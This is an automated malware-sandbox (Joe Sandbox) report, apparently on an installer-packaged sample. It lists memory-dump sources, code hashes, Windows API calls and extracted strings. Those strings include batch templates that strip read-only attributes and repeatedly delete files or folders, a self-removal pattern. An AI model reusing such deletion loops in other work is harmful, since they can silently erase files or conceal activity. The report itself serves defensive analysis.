                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3a3fcb4e088532be4b75e8d8f5ed8a1f213eb18bc556c559675471f2c8255930
                                                                                                                                                                                                                                                                          • Instruction ID: 396cb7f5f39de08588fcfd477a651d2d2302c716534a5390db4883ad508d7a13
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a3fcb4e088532be4b75e8d8f5ed8a1f213eb18bc556c559675471f2c8255930
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5110CB1904708DFCB41CF58D944789BBF4FB09728F2086AEE8189B381D3769A06CF84
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1d8d287d79c558fca8815360d9930192a6bcd5b49c4beef6cc36a696f12dfe01
                                                                                                                                                                                                                                                                          • Instruction ID: f6c53419280f5bb160809650dd5a300c88b00f60b45a21897c151b32a79d9f13
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d8d287d79c558fca8815360d9930192a6bcd5b49c4beef6cc36a696f12dfe01
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BF0E572A11234EFCB13C74CC805AA8B3ACEB84B21F128066F541DB241C774DE04C7C0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d0cf669cc4eb2d7ffc69947365edd169fc5f3815c1a80e06a49eceb964eab7be
                                                                                                                                                                                                                                                                          • Instruction ID: 7088681b700f3394578e972e5025bf9058cdb51bad846a299ad65d62c38da684
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0cf669cc4eb2d7ffc69947365edd169fc5f3815c1a80e06a49eceb964eab7be
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78F01D30008B12DBDB715F28ED04B827BE1BB05722B004B2DE4AA926E1CB24EC559B04
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 83f7c3a9c28ba902ead7bfae16d18044bdf2bb91cc3da091a84cf07b9e0d49cf
                                                                                                                                                                                                                                                                          • Instruction ID: b3d4df256d4a2336ccf6efd9fe9f1c3cac183eb14a0f4e591e8cadb40f5b247d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83f7c3a9c28ba902ead7bfae16d18044bdf2bb91cc3da091a84cf07b9e0d49cf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16E08C72911238EBCB11CB88C905A8AF3FCEB89A10B1244A6FA12E3102C6B0DE00D7C0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                                                                                                                                                                          • Instruction ID: 8e7d16e97c451f5bceaab12ee22c55e9c3d44fa2b16dc534f08a8a8f654ab662
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEE0EC72911228EBCB16DB99C945A8AF7FCFB49B50B55849AB501D7155C3B0DF00CBD0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5fc152b3ba31781cee426ba3657540d042328ad4f275800d3fd55c130f691854
                                                                                                                                                                                                                                                                          • Instruction ID: 9ec3547789f9e202e05e23532db5d9f98ebb6661729a1ac6657439502be41e8f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fc152b3ba31781cee426ba3657540d042328ad4f275800d3fd55c130f691854
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32C08CB4080E0086CE26CD1082B03A43364ABC2F82F82188CC6432B783DE1EDC83E700
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5ca74bf86403612b33997a65aa0df787ea7991c8497a48da527edbc35c2bef3e
                                                                                                                                                                                                                                                                          • Instruction ID: effd007271fb3f4b9db0ffa7247276f6738f5390b4343c8160817d5e1dc583ae
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ca74bf86403612b33997a65aa0df787ea7991c8497a48da527edbc35c2bef3e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01C08C3400290046DE2F9D2082B1BA63354F391783F94088CC8030B652C61E9E8AE681
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • #47.MSI(?,?,NOT Installed,0000000D,AA831995), ref: 6A550784
                                                                                                                                                                                                                                                                          • #47.MSI(?,?,Installed AND (REMOVE<>"ALL"),0000001D), ref: 6A5507D0
                                                                                                                                                                                                                                                                          • #47.MSI(?,?,Installed AND ((REMOVE="ALL") OR (AI_INSTALL_MODE="Remove")),0000003C), ref: 6A55081C
                                                                                                                                                                                                                                                                          • #47.MSI(?,?,UPGRADINGPRODUCTCODE,00000014), ref: 6A550868
                                                                                                                                                                                                                                                                          • #47.MSI(?,?,OLDPRODUCTS,0000000B), ref: 6A5508B4
                                                                                                                                                                                                                                                                          • #47.MSI(?,?,PATCH AND PATCH<>"MEDIASRCPROPNAME",00000023), ref: 6A550900
                                                                                                                                                                                                                                                                          • #47.MSI(?,?,(NOT Installed) AND (AI_UPGRADE="No") AND OLDPRODUCTS,00000035), ref: 6A55094C
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (NOT Installed) AND (AI_UPGRADE="No") AND OLDPRODUCTS$,^]j$,^]j$D^]j$D^]j$Installed AND ((REMOVE="ALL") OR (AI_INSTALL_MODE="Remove"))$Installed AND (REMOVE<>"ALL")$NOT Installed$OLDPRODUCTS$PATCH AND PATCH<>"MEDIASRCPROPNAME"$UPGRADINGPRODUCTCODE$\^]j$\^]j$]]j$]]j
                                                                                                                                                                                                                                                                          • API String ID: 0-723075601
                                                                                                                                                                                                                                                                          • Opcode ID: 40a1f17631d8094aead89789522d45838bd8095f2786e7992aabec8c55f17312
                                                                                                                                                                                                                                                                          • Instruction ID: 2f165b221c2a9b7266f889786d003b1308cf25938643d01ec9b2a5611ae474d2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40a1f17631d8094aead89789522d45838bd8095f2786e7992aabec8c55f17312
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75714B71A00214DFCF10EF69C898BEEBBF8EB49319F92041BE411F6651CB359954CBA5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(6A5D73DC,AA831995,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6A5687A2
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,AA831995,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6A5687B4
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6A59F013,000000FF), ref: 6A5687C1
                                                                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 6A5687CC
                                                                                                                                                                                                                                                                          • SymSetOptions.DBGHELP(80000016,?,?,?,?,?,?,?,?,?,?,?,00000000,6A59F013,000000FF), ref: 6A5687EF
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,6A59F013), ref: 6A568879
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6A568880
                                                                                                                                                                                                                                                                          • SymInitialize.DBGHELP(00000000,00000000,00000001,6A5AD308,00000000), ref: 6A5688BF
                                                                                                                                                                                                                                                                          • StackWalk.DBGHELP(0000014C,?,?,?,?,00000000,00000000,*** Stack Trace (x86) ***,?,?,?), ref: 6A568986
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6A568A9A
                                                                                                                                                                                                                                                                          • SymCleanup.DBGHELP(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6A59F013,000000FF), ref: 6A568B83
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6A59F013,000000FF), ref: 6A568BA5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CurrentInitialize$AddressCleanupEnterHandleLeaveLibraryLoadModuleOptionsProcProcessStackThreadWalk
                                                                                                                                                                                                                                                                          • String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                                                                                                                                                                                                                                          • API String ID: 4282195395-80696534
                                                                                                                                                                                                                                                                          • Opcode ID: f6a78db7120da95823415548c8ed0afa875b4a218581df6c9c6f298b0072a419
                                                                                                                                                                                                                                                                          • Instruction ID: 9cb0566e8d07171814cba183fea37cd20de9820c88cf4c7503aeadca4a4ce261
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6a78db7120da95823415548c8ed0afa875b4a218581df6c9c6f298b0072a419
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25D15FB1901249EFDF21CFA8C844BDE7BB8FF46304F054569E945AB291DB709A44CFA2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,DF534560,?,?,00000000), ref: 0029ECE3
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0029ED2B
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0029ED3E
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 0029ED86
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0029ED99
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0029EDE1
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0029EDF4
                                                                                                                                                                                                                                                                            • Part of subcall function 00276110: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00276151
                                                                                                                                                                                                                                                                            • Part of subcall function 00276110: _wcschr.LIBVCRUNTIME ref: 0027620F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • kernel32, xrefs: 0029ECDE
                                                                                                                                                                                                                                                                          • kernel32.dll, xrefs: 0029EF3D
                                                                                                                                                                                                                                                                          • SetDefaultDllDirectories, xrefs: 0029EDDB
                                                                                                                                                                                                                                                                          • SetDllDirectory, xrefs: 0029ED80
                                                                                                                                                                                                                                                                          • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 0029EC77
                                                                                                                                                                                                                                                                          • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 0029EC57, 0029EC5F
                                                                                                                                                                                                                                                                          • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 0029EC52
                                                                                                                                                                                                                                                                          • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 0029EC70, 0029EC7F
                                                                                                                                                                                                                                                                          • SetSearchPathMode, xrefs: 0029ED25
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$AddressProc$DirectoryHandleHeapModuleProcessSystem_wcschr
                                                                                                                                                                                                                                                                          • String ID: @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$SetDefaultDllDirectories$SetDllDirectory$SetSearchPathMode$kernel32$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 1258094593-3455668873
                                                                                                                                                                                                                                                                          • Opcode ID: 5849b21691e676d70f2f8014eeaf3455d36d07be9b85db89e4b108b707b5e1d3
                                                                                                                                                                                                                                                                          • Instruction ID: 1dd14a47ce026b6f7b7aae199667e02c0df88a8645fdbff1cf42fd0beecfb6fd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5849b21691e676d70f2f8014eeaf3455d36d07be9b85db89e4b108b707b5e1d3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AA18FB49203A8DBDF22CF96D849B9EBBB4FB01304F105259D9187B2C1D7B05909CF95
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000001F6,AA831995,?,00000000,?,?,?,?,?,?,00000000,6A59F405,000000FF), ref: 6A56A6CE
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000001F8,?,?,?,?,?,?,00000000,6A59F405,000000FF), ref: 6A56A6DB
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000001F7,Details <<,0000000A), ref: 6A56A728
                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,00000000), ref: 6A56A737
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 6A56A757
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569BB0: GetWindowLongW.USER32(?,000000F0,?,?,?,?), ref: 6A569BEF
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569BB0: GetWindowLongW.USER32(?,000000F0,?,?), ref: 6A569C00
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569BB0: SetWindowLongW.USER32(?,000000F0,00000000,?,?), ref: 6A569C12
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569BB0: GetWindowLongW.USER32(?,000000EC,?,?), ref: 6A569C25
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569BB0: SetWindowLongW.USER32(?,000000EC,00000000,?,?), ref: 6A569C34
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569BB0: SendMessageW.USER32(?,0000007F,00000000,00000000,?,?), ref: 6A569C48
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569BB0: SendMessageW.USER32(?,00000080,00000000,00000000,?,0000007F,00000000,00000000,?,?), ref: 6A569C57
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569BB0: GetClientRect.USER32(?,?,?,?), ref: 6A569C6E
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569BB0: GetClientRect.USER32(?,?,?,?,?,?), ref: 6A569C92
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000001F7,Details >>,0000000A), ref: 6A56A776
                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,00000000), ref: 6A56A785
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 6A56A7A5
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 6A56A7AC
